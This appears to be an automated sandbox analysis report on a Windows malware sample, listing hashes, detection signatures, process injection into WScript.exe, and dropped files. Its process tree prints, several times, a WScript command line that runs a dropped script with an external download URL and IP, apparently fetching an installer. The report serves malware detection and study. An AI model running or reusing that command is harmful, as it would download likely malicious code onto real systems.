c3fce4fbbaca468b5ebe96abfb78000e20facbbfc93a1258da1285cb6d3c0ea3

Analysis

max time kernel
121s
max time network
123s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
28/04/2024, 10:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

04f6c19769acdc51b8e9e033109366de_JaffaCakes118.exe
Size

184KB
MD5

04f6c19769acdc51b8e9e033109366de
SHA1

8b74c4a1354c6e83f39d937b5799d12f8459f050
SHA256

c3fce4fbbaca468b5ebe96abfb78000e20facbbfc93a1258da1285cb6d3c0ea3
SHA512

568891ecf6260543bf4500e9efdb3ccf757b7f9933d476283611683c0fe0baae071d7ba02e9caedecbbfa87b11b43203a3d9c8d3dc4c044cba1ae47f6fb587f8
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3O:/7BSH8zUB+nGESaaRvoB7FJNndnz

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	2008	WScript.exe
8	2008	WScript.exe
10	2008	WScript.exe
12	2736	WScript.exe
13	2736	WScript.exe
15	2904	WScript.exe
16	2904	WScript.exe
19	312	WScript.exe
20	312	WScript.exe
22	1360	WScript.exe
23	1360	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2412 wrote to memory of 2008	2412	04f6c19769acdc51b8e9e033109366de_JaffaCakes118.exe	28
PID 2412 wrote to memory of 2008	2412	04f6c19769acdc51b8e9e033109366de_JaffaCakes118.exe	28
PID 2412 wrote to memory of 2008	2412	04f6c19769acdc51b8e9e033109366de_JaffaCakes118.exe	28
PID 2412 wrote to memory of 2008	2412	04f6c19769acdc51b8e9e033109366de_JaffaCakes118.exe	28
PID 2412 wrote to memory of 2736	2412	04f6c19769acdc51b8e9e033109366de_JaffaCakes118.exe	30
PID 2412 wrote to memory of 2736	2412	04f6c19769acdc51b8e9e033109366de_JaffaCakes118.exe	30
PID 2412 wrote to memory of 2736	2412	04f6c19769acdc51b8e9e033109366de_JaffaCakes118.exe	30
PID 2412 wrote to memory of 2736	2412	04f6c19769acdc51b8e9e033109366de_JaffaCakes118.exe	30
PID 2412 wrote to memory of 2904	2412	04f6c19769acdc51b8e9e033109366de_JaffaCakes118.exe	32
PID 2412 wrote to memory of 2904	2412	04f6c19769acdc51b8e9e033109366de_JaffaCakes118.exe	32
PID 2412 wrote to memory of 2904	2412	04f6c19769acdc51b8e9e033109366de_JaffaCakes118.exe	32
PID 2412 wrote to memory of 2904	2412	04f6c19769acdc51b8e9e033109366de_JaffaCakes118.exe	32
PID 2412 wrote to memory of 312	2412	04f6c19769acdc51b8e9e033109366de_JaffaCakes118.exe	34
PID 2412 wrote to memory of 312	2412	04f6c19769acdc51b8e9e033109366de_JaffaCakes118.exe	34
PID 2412 wrote to memory of 312	2412	04f6c19769acdc51b8e9e033109366de_JaffaCakes118.exe	34
PID 2412 wrote to memory of 312	2412	04f6c19769acdc51b8e9e033109366de_JaffaCakes118.exe	34
PID 2412 wrote to memory of 1360	2412	04f6c19769acdc51b8e9e033109366de_JaffaCakes118.exe	36
PID 2412 wrote to memory of 1360	2412	04f6c19769acdc51b8e9e033109366de_JaffaCakes118.exe	36
PID 2412 wrote to memory of 1360	2412	04f6c19769acdc51b8e9e033109366de_JaffaCakes118.exe	36
PID 2412 wrote to memory of 1360	2412	04f6c19769acdc51b8e9e033109366de_JaffaCakes118.exe	36

C:\Users\Admin\AppData\Local\Temp\04f6c19769acdc51b8e9e033109366de_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\04f6c19769acdc51b8e9e033109366de_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2412
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf227E.js" http://www.djapp.info/?domain=hhDqkyzMyQ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyy C:\Users\Admin\AppData\Local\Temp\fuf227E.exe
  2⤵
  - Blocklisted process makes network request
  PID:2008
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf227E.js" http://www.djapp.info/?domain=hhDqkyzMyQ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyy C:\Users\Admin\AppData\Local\Temp\fuf227E.exe
  2⤵
  - Blocklisted process makes network request
  PID:2736
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf227E.js" http://www.djapp.info/?domain=hhDqkyzMyQ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyy C:\Users\Admin\AppData\Local\Temp\fuf227E.exe
  2⤵
  - Blocklisted process makes network request
  PID:2904
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf227E.js" http://www.djapp.info/?domain=hhDqkyzMyQ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyy C:\Users\Admin\AppData\Local\Temp\fuf227E.exe
  2⤵
  - Blocklisted process makes network request
  PID:312
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf227E.js" http://www.djapp.info/?domain=hhDqkyzMyQ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyy C:\Users\Admin\AppData\Local\Temp\fuf227E.exe
  2⤵
  - Blocklisted process makes network request
  PID:1360

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
0420900c1ad94085af3922a624b66971

SHA1
a0eec1bfb79d181a58caa48b7f3b6f0821249244

SHA256
ff8d081f314c3f4650d8f5803f0d8b4d824c6f440cbffd5e0763770934be903f

SHA512
38e14db9cae6e1bd1eb5d836b8ed520669125bd89eefb256de8770f971b112bf9d1b6f03d464aab3c4550d15b9afc8e4c7b8de1dfbc94b79b93eb6982eaaddd3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
dcffa078a380e84dd94b53a76eff2211

SHA1
f12f855baecb7ddd76689cfab9e17267694c5965

SHA256
81462740493c31279350340682bdac63f323ad0be03003ca2a7e3a7aeabfbc62

SHA512
c2ff75173149eb14d86431a1ab197bd089a6ab1d93c9d3d14dea5d402ec0213c996a767db0400e0f2f1ec48d3d3c949066c120126ca5b26c4dd09bd3d9191c27

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
2795daf0ccc5459af42fe533008dda72

SHA1
1ac75bdaf5dd3bbdc0538204d27968d92a0f5613

SHA256
a3652118ceda3d4d6f44a15ad91c95229802a41d376ce17a0525314a04cfde0f

SHA512
db985590faf45e6330f420315a2816d275ba3c3c63a5acfdda70fa37ac0e43defac245b6d0580a87d520eea47aef71c39b7ccf1ec9b801d840f6698854a80a3e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
17b1e2c0e7f579d76fd45d160735bac4

SHA1
7edc2992f7a5d8fe70289854ee1111c5a47029e5

SHA256
8edf7564a5da117a8cd31861a7c2679981712f1f3bdd098eca55150bc1103955

SHA512
5ca2473b31b0fc66fc31e106e03c46971e7c458a273ba95f2322805788931999bbb5326c20294f7834bd17fbe35ea488df7b518e12b3fbbe564c8ced966bbd9c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9ZQLLOZN\domain_profile[1].htm

Filesize
40KB

MD5
7bf7293ea095147603a26911be746134

SHA1
cbec20b201aed933e0b747c1e1b206faa3c8c225

SHA256
b7023d029112d9fd9c5f3c1d3c3f70d7b8f57c3ed51c90979dd2ca70a2262f64

SHA512
9b03259e6b5d7359e3c339bd00b1afa23def290647ae39c0eb20b2f1c728d916ca288cddffdaf37c482d6d2bc0b928125108ba4cf129186b57b2a5f7130d625e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9ZQLLOZN\domain_profile[1].htm

Filesize
40KB

MD5
b63dc3eef7d44daf9f8de99ec39cd35d

SHA1
3e7a34af6ae691f307eef5645e490ed36784981b

SHA256
76aee1ea0aeae6487285b2e0924b98cab48a838329bf91865f156f400a006ad7

SHA512
ea45cb4e979b46c28cdf61b938a92e622cf80a9562c556cbef729d87d1ac934073f55220bba1729107c96e73d435173aa7c730b49b78a191daaa051b71f824cf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9ZQLLOZN\domain_profile[1].htm

Filesize
40KB

MD5
38ef6420bf72e0e5cb1ec56edebe52ac

SHA1
ed32379562a990f29241a941f9782db6cf481b17

SHA256
1c53a161f0ad99c01c9306fa36b178aa12c6b8b9c9c009dac8e7c2c1d3fd6f19

SHA512
d3f926aca001dec794a422472d5101753f2cfa1ff64ed1a6336b27d98ab0f8936d43ac83b32eb9196936cc8d7fbfd7a9a32a827e66ec83138e9fe266ae701d76

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OORQXHVT\domain_profile[1].htm

Filesize
40KB

MD5
d3d53116e8fe6e3ffae93c674c458e3a

SHA1
795e8d33e750e3a9f8cd76414dc17676bc45ae1f

SHA256
e1371fbcb912dc3f040d3c1d0c411456135e70e50fab94437f9c34a9f6f8a7ae

SHA512
ef6f4c41b4071098dbd9f6a78fef71c1e8a14de4213c4aa45e60b54d18222835880e5762ddeb162787573ea8ac9dc57f27c8a1fcc30608a710a73c85d5c3688e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OORQXHVT\domain_profile[1].htm

Filesize
40KB

MD5
21a62fd34b9af410144257123948553f

SHA1
21aacb151e8d76b2ad39e8dea48e7a091363b0e2

SHA256
1abe89e59fcff2b6c831d47a007052883145ef4b7b110954510af708f9a0b98d

SHA512
acb8ac0f23d3ea7bd650f3bf017faf44767d186e3b35e9ca6be0948c74d06a85bcc4cc1032798a608b4d79c29bb3caaed186dcb3b13dafe8d0e746d8fcb8f675

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab52B2.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar6B52.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf227E.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\7VZ9WJPN.txt

Filesize
175B

MD5
3a8977c60c4d0b4f9c51b340ee88a67a

SHA1
925cb30a58eee25de65f938a18d7d97916d2f14a

SHA256
b2fde2552fb550564c3e82bfc8b298634d3142b798180cc3472332bbdc360b8b

SHA512
b10070e483cf69c5b5eff8ab7c2c0c40735a3654b76913c8673cd3fe83232563da2a7ad2a555fa7d0ea482115133c3c23542bbdf14113422229d8c653d44c2cf

Download Submit